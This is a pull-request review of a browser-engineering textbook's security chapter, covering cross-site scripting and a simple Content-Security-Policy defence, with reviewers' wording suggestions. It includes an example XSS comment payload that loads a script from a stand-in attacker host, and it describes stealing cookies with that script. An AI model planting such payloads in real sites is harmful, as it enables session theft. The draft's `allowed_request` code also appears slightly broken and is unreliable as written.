Rewrite Chapter 10 XSS section (#225)
browserengineering/book: book/security.md

    routes, which would send even a correctly-retrieved IP address to
    the wrong physical computer.

[^14]: Security is very hard.

But attackers might be able to get *your server* or *your browser* to
help steal your cookie values...

Cross-site scripting
====================

With cookies accessible from JavaScript, any scripts run on our server
could, in principle, read the cookie value. This might seem
benign---doesn't our server only run `comment.js`? Well...

A web service needs to defend itself from being *misused*. Consider
the code in our guest book that outputs guest book entries:

``` {.python file=server indent=8}
out += "<p>" + entry + " <i>by " + who + "</i></p>"
```

Note that `entry` can be anything, anything the user might stick into
our comment form: even include a user-written `<script>` tag! Let's
imagine that you're logged in as one user, maybe `crashoverride`, but
would like to gain access to another username, maybe `nameless`. You
could post the comment:

    Hi! <script src="http://my-server/evil.js"></script>

Our server would then output the HTML:

    <p>Hi! <script src="http://my-server/evil.js"></script>
    <i> by crashoverride</i></p>

> So, our browser would download and run the `evil.js` script. So

Reviewer: ```suggestion
Our browser would download and run the `evil.js` script. Then
```

> `evil.js` could access `document.cookie` and do something evil; in

Reviewer: ```suggestion
`evil.js` could access `document.cookie` and do something evil[^Like impersonating you]; in
```

> real browser, this might mean using `fetch` to secretly send that

Reviewer: ```suggestion
a real browser, this might mean using `fetch` to secretly send that
```

cookie to a server the attacker controls.[^no-fetch]

[^no-fetch]: Our browser doesn't implement `fetch`, but that doesn't
    mean this attack won't work. For example, the evil script can

>     replace the whole page with a link that directs their site and

Reviewer: ```suggestion
    replace the whole page with a link that points at their site and
```

    This is a very limited CSP implementation.

This parsing needs to happen _before_ we request any JavaScript or
CSS, because before we request those things, we need to check whether
the request is allowed:

``` {.python}
class Tab:
    def load(self, url, body=None):
        # ...
        for script in scripts:
            script_url = resolve_url(script, url)
            if not self.allowed_request(script_url):
                print("Blocked script", script, "due to CSP")
                continue
            # ...
```

We first resolve the script's relative URL to an absolute URL. Then we
check to see if it starts with any of the allowed servers, and if not,
we skip that script Do the same for CSS files.

The `allowed_request` logic is a little tricky: it needs to handle both
the case of no `Content-Security-Policy` and the case where there is
one:

``` {.python}
class Tab:
    def allowed_request(self, url):
        if self.allowed_servers == None: return True
        for server in allowed_servers:
            if url.startswith(server):
                return True
        return False
```

To test that this works, we can first make our server send a

> `Content-Security-Policy`:

Reviewer: ```suggestion
`Content-Security-Policy` header:
```

``` {.python file=server}
def handle_connection(conx):
    # ...
    response += "Content-Security-Policy: default-src http://localhost:8000\r\n"
    # ...
```

> For testing, let's next modify the web pages the server generates to

Reviewer: ```suggestion
For testing, let's next modify the web pages the server to generate a
```
